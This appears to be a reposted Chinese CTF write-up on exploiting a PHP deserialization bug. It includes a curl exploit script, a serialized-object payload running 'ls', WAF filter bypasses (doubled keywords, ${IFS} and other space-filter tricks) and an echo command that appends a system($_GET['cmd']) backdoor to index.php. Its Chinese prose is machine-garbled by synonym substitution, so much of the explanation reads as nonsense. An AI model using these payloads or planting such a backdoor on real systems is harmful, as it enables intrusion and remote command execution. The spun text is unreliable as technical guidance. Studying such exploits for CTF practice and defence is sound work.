PHP反序列化裂痕简介及相干能力小结

通过urldecode举办对%00举办解码

<?php  
$curl = curl_init();  
curl_setopt($curl,CURLOPT_URL,'http://192.168.27.144/?first=doller&a=var=give%26bbb=me%26ccc=flag');  
curl_setopt($curl,CURLOPT_POST, 1);  
$n = urldecode('%00');  
$o = 'O:4:"come":2:{s:12:"'.$n.'come'.$n.'method";s:5:"echos";s:10:"'.$n.'come'.$n.'args";a:1:{i:0;s:3:"&ls";}}';  
curl_setopt($curl,CURLOPT_POSTFIELDS, ['come'=>$o]);  
curl_exec($curl);  
curl_close($curl);  
?> 

不外有更快的要领。。。直接通过postman的urlencode/urldecode即可。由于0×00也就是url编码中的%00。以是url编码一下就完事。

要用%00包裹住类名，不能包多了也不能包少了，固然%00也算一个字符，可是Php序列化的时辰已经帮我们算好了，以是不必要修改，可能说，我们之前的谁人长度值就是错的。。。

选中%00，右键，选择decode即可。

功效：

我们再发送，有response了，

发明有flag.txt。因为我是windows情形，读取文件行使type呼吁。

type呼吁名目：type文件路径

修改payload。

发明无回显

呼吁是对的，是由于方才我们忽略的waf函数在捣蛋。方才提到wakup时将每个args变量拿去在waf函数中洗了个澡。过滤内容为：

flag这个字符串被替代为空，可以通过双写flag来绕过：flflagag

不外在第一个正则中过滤了空格就有点难熬了，总所周知体系呼吁都是要打个空格才气添加参数的，过滤了空格怎么破?

思来想去后，发明windows没有人提供资料，可是linux下有许多。

绕过要领：

!! （最好一开始就先用这个，执行上一条呼吁，大概有奇效。。）  
cat${IFS}flag.txt  
cat$IFS$9flag.txt  
cat<flag.txt  
cat<>flag.txt  
{cat,flag.txt}  
KG=$’x20flag.txt’&&cat$KG （x20转换成字符串就是空格，这里通过变量的方法奇妙绕过） 

任意用一个(linux情形下)：

windows情形下的话时我突发奇想任意试出来的。合用性不是很广，也就type这个呼吁能用用。。

type.flag.txt  
type,flag.txt  
echo,123456 

echo的话这个假如脑洞大点可以通过echo >>的方法将一句话追加到php文件末端，到达getShell的目标。不外这样子假如该php文件很类型的用了?>末了就莫得，假如没有那么类型，没用?>末了就可以乐成。

示例：

echo,@system($_GET['cmd']);>>index.php 

然后就可以通过新的后门来getshell了。

（编辑：湖南网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!